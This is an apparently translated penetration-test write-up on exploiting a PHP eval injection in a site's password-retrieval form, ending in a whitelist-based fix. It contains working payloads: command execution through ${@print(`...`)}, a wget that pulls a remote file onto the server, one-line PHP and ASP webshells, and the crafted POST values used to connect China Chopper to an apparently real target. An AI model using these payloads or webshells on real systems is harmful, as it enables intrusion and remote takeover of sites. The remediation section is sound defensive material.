0x1: Information Network Collection

Based on the author's penetration-testing experience, the HTTP response headers returned by curl are a useful reference. They can be obtained as follows. Here curl is installed on CentOS with yum install curl. Then use the curl -I url command to check the server information. Here we can see that the web application stack is Ubuntu, PHP and Apache, and the web program is written in PHP.

IP lookup: www.2cto.com. IP address: the IP address is withheld in this post for the customer's security. Port enumeration, for example, can be done with tools such as nmap, which is omitted here.

0x2: Vulnerability Discovery

For vulnerability scanning, tools such as WVS and Burp Suite can be used; if the website has little content and is written in PHP, WVS is recommended. After multiple scans, a code execution vulnerability was found in the member password retrieval function. As is the author's habit, Burp Suite is used as the packet capture and replay tool, because it is the best of these tools: set the proxy in IE, intercept the request and modify it. The md5 value echoed back confirms that the injected expression was actually executed. Expressions such as

    ${@print(`id`)}
    ${@print(`wget -O test.php http://www.xinyuse.org/xx.txt`)}

can then be used. Note that the quotation marks here are reverse quotes (backticks). Various commands can be executed this way. Unfortunately, although commands executed successfully in this test, attempts to write a webshell to the server (creating or modifying a file) failed.

0x3: Kitchen Knife Breakthrough

Take a closer look at how the vulnerability is formed:

    // verify user input data
    function validate()
    {
        $arrErrorMsg = array(); // prompt messages
        $errorMsgNo = 0;        // prompt message number
        $isize = count($this->arrCheckData) / 4; // number of check rows

        // check the data in sequence
        for ($i = 0; $i < $isize; $i++)
        {
            $fieldId = $this->arrCheckData[$i * 4];                   // form field Id
            $fields  = explode(",", $this->arrCheckData[$i * 4 + 1]); // related form field Ids
            $method  = $this->arrCheckData[$i * 4 + 2];               // check method
            $msg     = $this->arrCheckData[$i * 4 + 3];               // error code returned when the check fails

            $fieldsNum = count($fields) - 1; // number of related form fields
            for ($j = $fieldsNum; $j >= 0; $j--)
            {
                $field = $fields[$j]; // related form field
                $rdata = "data";
                if ($j > 0)
                {
                    $rdata .= $j;
                }

                // the request value is spliced into the method expression as a quoted string
                $method = str_replace($rdata, "\"" . addslashes($_REQUEST[$field]) . "\"", $method);
            }

            if (substr($method, 0, 1) == "!")
            {
                $method = substr($method, 1);
                eval("\$b = !\$this->$method;");
            }
            else
            {
                eval("\$b = \$this->$method;");
            }
            // ... remainder of validate() not shown in the original writeup

The vulnerability is caused by eval: values are taken from the form, passed through addslashes as the only filtering, and then spliced into a double-quoted PHP string that is evaluated. addslashes only escapes quotes and backslashes, so it does nothing against ${...} interpolation inside that double-quoted string; in effect the input is not filtered at all, and shell code can be written directly during code execution. It is more convenient to use the kitchen knife, though, so a piece of code is written locally for testing.

0x4 Local Test

    <?php
    error_reporting(E_ALL & ~E_NOTICE);
    $str = "fuck you webshell $_POST[cmd]";
    eval("\$str = \"$str\";");
    ?>

The code is successfully executed.

0x5 Kitchen Knife Connection Analysis

In general we write a one-sentence Trojan such as

    <?php @eval($_POST[cmd]); ?>

and then connect to it directly with the kitchen knife. However, in the scenario here the code is only executed through a POST submission interpolated into a string. Taking this into account, it has to be said that the kitchen knife is a powerful website management tool. See section B) in the kitchen knife manual:
    B) Other aspects:
    -----------------------------------------------------------------------------
    Add additional submitted data. For example, for a new ASP server script:
    <%
    Set o = Server.createObject("ScriptControl")
    o.language = "vbscript"
    o.addcode(Request("SC"))
    o.run "ff", Server, Response, Request, Application, Session, Error
    %>
    enter:
    <O>SC=function ff(Server, Response, Request, Application, Session, Error):eval(request("pass")):end function</O>
    and connect with the password pass.

Following the manual, use <o></o> to construct the data packet. The values obtained after multiple tests are:

    cmd=${@eval($_POST[moon])}
    moon=${@phpinfo()}

The kitchen knife connected successfully and the target website was penetrated:
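As an added example (not code from the original writeup or from the vulnerable application), here is how the validate() dispatcher from 0x3 can be rewritten so that form data can never become PHP source: the check column names a method from a fixed whitelist, and the request values are passed to that method as arguments instead of being spliced into a string handed to eval. The four-column table layout, the method names isNotEmpty/isEmail/maxLength, the "method:limit" spec syntax and the sample request are assumptions made for this demonstration.

```php
<?php
// Added example, not the original application's code. Replaces the
// str_replace + eval dispatcher from 0x3 with a whitelist-based call.

class SafeValidator
{
    // Same 4-column row layout as the original arrCheckData
    // (fieldId, related fields, check spec, error code), but the check spec
    // is now a method NAME (optionally "!" prefixed, optionally ":limit"),
    // never a PHP expression template. Layout is an assumption for the demo.
    private array $arrCheckData;
    private array $request;

    // Only methods listed here may be invoked; anything else is rejected.
    private const ALLOWED = ['isNotEmpty', 'isEmail', 'maxLength'];

    public function __construct(array $arrCheckData, array $request)
    {
        $this->arrCheckData = $arrCheckData;
        $this->request = $request;
    }

    private function isNotEmpty(string $data): bool
    {
        return trim($data) !== '';
    }

    private function isEmail(string $data): bool
    {
        return filter_var($data, FILTER_VALIDATE_EMAIL) !== false;
    }

    private function maxLength(string $data, int $limit): bool
    {
        return strlen($data) <= $limit;
    }

    /** Returns the list of error codes; an empty array means every check passed. */
    public function validate(): array
    {
        $errors = [];
        $rows = intdiv(count($this->arrCheckData), 4);

        for ($i = 0; $i < $rows; $i++) {
            $fields = explode(',', $this->arrCheckData[$i * 4 + 1]);
            $spec   = $this->arrCheckData[$i * 4 + 2]; // e.g. "!isEmail" or "maxLength:32"
            $msg    = $this->arrCheckData[$i * 4 + 3];

            // Keep the original's "!" negation, but as a boolean, not as eval'd text.
            $negate = substr($spec, 0, 1) === '!';
            if ($negate) {
                $spec = substr($spec, 1);
            }
            [$method, $extra] = array_pad(explode(':', $spec, 2), 2, null);

            if (!in_array($method, self::ALLOWED, true)) {
                throw new InvalidArgumentException("unknown check method: $method");
            }

            // Request values are passed as ARGUMENTS. A value such as
            // "${@phpinfo()}" arrives as a literal string and is never parsed as PHP.
            $args = [];
            foreach ($fields as $field) {
                $args[] = (string)($this->request[$field] ?? '');
            }
            if ($extra !== null) {
                $args[] = (int)$extra;
            }

            $ok = $this->$method(...$args);
            if ($negate) {
                $ok = !$ok;
            }
            if (!$ok) {
                $errors[] = $msg;
            }
        }
        return $errors;
    }
}

// Constructed sample request mimicking the password-retrieval form, with the
// writeup's interpolation payload placed in the email field.
$request = [
    'email'    => '${@phpinfo()}',
    'username' => 'alice',
];
$checks = [
    'email',    'email',    'isEmail',      'ERR_EMAIL',
    'username', 'username', 'isNotEmpty',   'ERR_USER_EMPTY',
    'username', 'username', 'maxLength:32', 'ERR_USER_LONG',
];

$v = new SafeValidator($checks, $request);
var_dump($v->validate());
```

With the writeup's ${@phpinfo()} payload in the email field, validate() returns only the ERR_EMAIL code; the payload is compared as a plain string and phpinfo() is never executed. The same audit rule applies when reviewing the original code base: any eval() whose argument is a double-quoted string built from request data is reachable exactly as 0x2 shows, and addslashes does not change that, so the fix is to remove the code generation rather than to add more escaping.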
0x5 Summary

This penetration took two days in total. The road from discovery to breakthrough was not smooth; there were obstacles along the way. One last remark: it is important to learn to use existing knowledge.